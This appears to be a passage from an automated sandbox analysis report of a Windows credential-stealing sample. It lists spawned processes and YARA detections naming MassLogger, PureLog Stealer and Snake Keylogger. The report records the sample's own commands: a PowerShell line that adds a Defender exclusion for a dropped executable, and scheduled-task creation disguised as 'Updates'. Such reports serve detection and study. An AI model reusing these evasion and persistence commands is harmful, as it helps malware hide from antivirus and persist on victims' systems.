                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
                                                                                                                                                                    Imagebase:0x440000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
                                                                                                                                                                    Imagebase:0xb10000
                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2696625029.000000000794C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'290'240 bytes
                                                                                                                                                                    MD5 hash:C0525CFD34E032B8DE30555E54329700
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\alg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'225'728 bytes
                                                                                                                                                                    MD5 hash:837DCB726B9BB3B6F4FEF3318B9DEEAD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:138'056 bytes
                                                                                                                                                                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:174'408 bytes
                                                                                                                                                                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:154'952 bytes
                                                                                                                                                                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'348'608 bytes
                                                                                                                                                                    MD5 hash:A402C4C181FB483490A130C24E7F84A6
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:16:44:25
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'242'624 bytes
                                                                                                                                                                    MD5 hash:B184A2D21BE1424241C0CC6F3EE4C667
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:16:44:25
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:2'354'176 bytes
                                                                                                                                                                    MD5 hash:D2EAE0B17D8ED7CE90F29615B714FC9B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:16:44:25
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'356'800 bytes
                                                                                                                                                                    MD5 hash:644513105C5FAA8D93951A3690E4014C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:16:44:26
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'278'464 bytes
                                                                                                                                                                    MD5 hash:2AF6C23F4C869205351AA38C5DD66D6E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:16:44:26
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'235'968 bytes
                                                                                                                                                                    MD5 hash:4C2FEBAD6B92DDA4F72130648DB37727
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                    MD5 hash:06C13587E9A7AF60860CB6E2C4F3A7B2
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:23
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'150'976 bytes
                                                                                                                                                                    MD5 hash:3A2A9E48FBD06CF338FA403E33134177
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'141'248 bytes
                                                                                                                                                                    MD5 hash:E970472BE732DDA93E40BA89E643BD45
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'846'784 bytes
                                                                                                                                                                    MD5 hash:02C2C736D5DC9AC9088C92AFC077A118
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'146'880 bytes
                                                                                                                                                                    MD5 hash:F35B03B0A56AB372234FE7A532455C96
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'455'616 bytes
                                                                                                                                                                    MD5 hash:EA5AC5AC3ADFDE43933DEF676A6978C0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:16:44:28
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'511'424 bytes
                                                                                                                                                                    MD5 hash:D09CFE9983E805B17E25ED1928A06826
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:16:44:28
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'455'616 bytes
                                                                                                                                                                    MD5 hash:85B511CA7AB5F39352DEB0D3C0A048DC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:16:44:28
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'801'216 bytes
                                                                                                                                                                    MD5 hash:E46CE79404D95E10B788E99FB6C2C36E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:16:44:28
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                    Imagebase:0x7ff7fb730000
                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:16:44:28
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\vds.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'303'552 bytes
                                                                                                                                                                    MD5 hash:0C54A7E73768E6C53E87391113A18ADF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:35
                                                                                                                                                                    Start time:16:44:29
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:2'164'736 bytes
                                                                                                                                                                    MD5 hash:ADB425AC8592C2AD75F997794106A5E3
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:16:44:36
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
                                                                                                                                                                    Imagebase:0xb10000
                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:16:44:37
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:42
                                                                                                                                                                    Start time:16:44:37
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000002.2671075234.000000000791C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:13.4%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:255
                                                                                                                                                                      Total number of Limit Nodes:14
